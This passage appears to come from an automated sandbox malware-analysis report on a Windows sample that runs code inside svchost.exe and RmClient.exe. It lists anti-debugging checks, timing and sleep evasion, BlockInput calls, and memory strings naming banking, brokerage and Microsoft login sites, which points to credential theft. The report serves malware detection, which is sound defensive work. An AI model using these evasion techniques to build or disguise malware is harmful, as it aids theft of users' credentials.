Source: C:\Windows\SysWOW64\RmClient.exe API/Special instruction interceptor: Address: 7FF8C88ED7E4
Source: C:\Windows\SysWOW64\RmClient.exe API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\RmClient.exe API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\RmClient.exe API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\RmClient.exe API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\RmClient.exe API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\RmClient.exe API/Special instruction interceptor: Address: 7FF8C88EDA44
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0367096E rdtsc 2_2_0367096E
Source: C:\Windows\SysWOW64\RmClient.exe Window / User API: threadDelayed 9816 Jump to behavior
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe API coverage: 3.5 %
Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
Source: C:\Windows\SysWOW64\RmClient.exe API coverage: 2.6 %
Source: C:\Windows\SysWOW64\RmClient.exe TID: 5324 Thread sleep count: 157 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe TID: 5324 Thread sleep time: -314000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe TID: 5324 Thread sleep count: 9816 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe TID: 5324 Thread sleep time: -19632000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe TID: 5628 Thread sleep time: -70000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe TID: 5628 Thread sleep count: 36 > 30 Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe TID: 5628 Thread sleep time: -54000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe TID: 5628 Thread sleep count: 41 > 30 Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe TID: 5628 Thread sleep time: -41000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\RmClient.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452492
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442886
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_004788BD
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_004339B6
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, 0_2_0045CAFA
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00431A86
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD27
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0045DE8F FindFirstFileW,FindClose, 0_2_0045DE8F
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8B
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_0069C280 FindFirstFileW,FindNextFileW,FindClose, 5_2_0069C280
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary, 0_2_0040E500
Source: 661035W.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 661035W.5.dr Binary or memory string: discord.comVMware20,11696428655f
Source: 661035W.5.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 661035W.5.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 661035W.5.dr Binary or memory string: global block list test formVMware20,11696428655
Source: 661035W.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 661035W.5.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 661035W.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 661035W.5.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: RmClient.exe, 00000005.00000002.4588947900.000000000096D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
Source: 661035W.5.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: 661035W.5.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 661035W.5.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 661035W.5.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 661035W.5.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 661035W.5.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: firefox.exe, 00000008.00000002.2665973894.000002AC8059C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 661035W.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 661035W.5.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 661035W.5.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 661035W.5.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 661035W.5.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: 661035W.5.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: avmjQSNkeFbUoa.exe, 00000006.00000002.4589578770.000000000152F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
Source: 661035W.5.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 661035W.5.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 661035W.5.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 661035W.5.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 661035W.5.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 661035W.5.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 661035W.5.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 661035W.5.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 661035W.5.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 661035W.5.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0367096E rdtsc 2_2_0367096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417583 LdrLoadDll, 2_2_00417583
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0045A370 BlockInput, 0_2_0045A370
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D590
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress, 0_2_0040EBD0
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0420A4D8 mov eax, dword ptr fs:[00000030h] 0_2_0420A4D8
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0420A538 mov eax, dword ptr fs:[00000030h] 0_2_0420A538
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_04208E88 mov eax, dword ptr fs:[00000030h] 0_2_04208E88
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D437C mov eax, dword ptr fs:[00000030h] 2_2_036D437C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h] 2_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h] 2_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h] 2_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B035C mov ecx, dword ptr fs:[00000030h] 2_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h] 2_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h] 2_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036FA352 mov eax, dword ptr fs:[00000030h] 2_2_036FA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D8350 mov ecx, dword ptr fs:[00000030h] 2_2_036D8350
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0370634F mov eax, dword ptr fs:[00000030h] 2_2_0370634F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03708324 mov eax, dword ptr fs:[00000030h] 2_2_03708324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03708324 mov ecx, dword ptr fs:[00000030h] 2_2_03708324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03708324 mov eax, dword ptr fs:[00000030h] 2_2_03708324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03708324 mov eax, dword ptr fs:[00000030h] 2_2_03708324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h] 2_2_0366A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h] 2_2_0366A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h] 2_2_0366A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362C310 mov ecx, dword ptr fs:[00000030h] 2_2_0362C310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03650310 mov ecx, dword ptr fs:[00000030h] 2_2_03650310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] 2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] 2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] 2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] 2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] 2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] 2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] 2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] 2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036663FF mov eax, dword ptr fs:[00000030h] 2_2_036663FF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036EC3CD mov eax, dword ptr fs:[00000030h] 2_2_036EC3CD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h] 2_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h] 2_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h] 2_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h] 2_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B63C0 mov eax, dword ptr fs:[00000030h] 2_2_036B63C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h] 2_2_036DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h] 2_2_036DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DE3DB mov ecx, dword ptr fs:[00000030h] 2_2_036DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h] 2_2_036DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h] 2_2_036D43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h] 2_2_036D43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h] 2_2_0362E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h] 2_2_0362E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h] 2_2_0362E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365438F mov eax, dword ptr fs:[00000030h] 2_2_0365438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365438F mov eax, dword ptr fs:[00000030h] 2_2_0365438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03628397 mov eax, dword ptr fs:[00000030h] 2_2_03628397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03628397 mov eax, dword ptr fs:[00000030h] 2_2_03628397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03628397 mov eax, dword ptr fs:[00000030h] 2_2_03628397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03634260 mov eax, dword ptr fs:[00000030h] 2_2_03634260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03634260 mov eax, dword ptr fs:[00000030h] 2_2_03634260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03634260 mov eax, dword ptr fs:[00000030h] 2_2_03634260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362826B mov eax, dword ptr fs:[00000030h] 2_2_0362826B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B8243 mov eax, dword ptr fs:[00000030h] 2_2_036B8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B8243 mov ecx, dword ptr fs:[00000030h] 2_2_036B8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0370625D mov eax, dword ptr fs:[00000030h] 2_2_0370625D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362A250 mov eax, dword ptr fs:[00000030h] 2_2_0362A250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03636259 mov eax, dword ptr fs:[00000030h] 2_2_03636259
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h] 2_2_036EA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h] 2_2_036EA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362823B mov eax, dword ptr fs:[00000030h] 2_2_0362823B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h] 2_2_036402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h] 2_2_036402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h] 2_2_036402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037062D6 mov eax, dword ptr fs:[00000030h] 2_2_037062D6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036402A0 mov eax, dword ptr fs:[00000030h] 2_2_036402A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036402A0 mov eax, dword ptr fs:[00000030h] 2_2_036402A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h] 2_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C62A0 mov ecx, dword ptr fs:[00000030h] 2_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h] 2_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h] 2_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h] 2_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h] 2_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h] 2_2_0366E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h] 2_2_0366E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h] 2_2_036B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h] 2_2_036B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h] 2_2_036B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03704164 mov eax, dword ptr fs:[00000030h] 2_2_03704164
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03704164 mov eax, dword ptr fs:[00000030h] 2_2_03704164
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h] 2_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h] 2_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C4144 mov ecx, dword ptr fs:[00000030h] 2_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h] 2_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h] 2_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0362C156 mov eax, dword ptr fs:[00000030h] 2_2_0362C156
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C8158 mov eax, dword ptr fs:[00000030h] 2_2_036C8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03636154 mov eax, dword ptr fs:[00000030h] 2_2_03636154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03636154 mov eax, dword ptr fs:[00000030h] 2_2_03636154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03660124 mov eax, dword ptr fs:[00000030h] 2_2_03660124
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h] 2_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h] 2_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h] 2_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h] 2_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h] 2_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h] 2_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h] 2_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h] 2_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h] 2_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h] 2_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DA118 mov ecx, dword ptr fs:[00000030h] 2_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h] 2_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h] 2_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h] 2_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036F0115 mov eax, dword ptr fs:[00000030h] 2_2_036F0115
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037061E5 mov eax, dword ptr fs:[00000030h] 2_2_037061E5
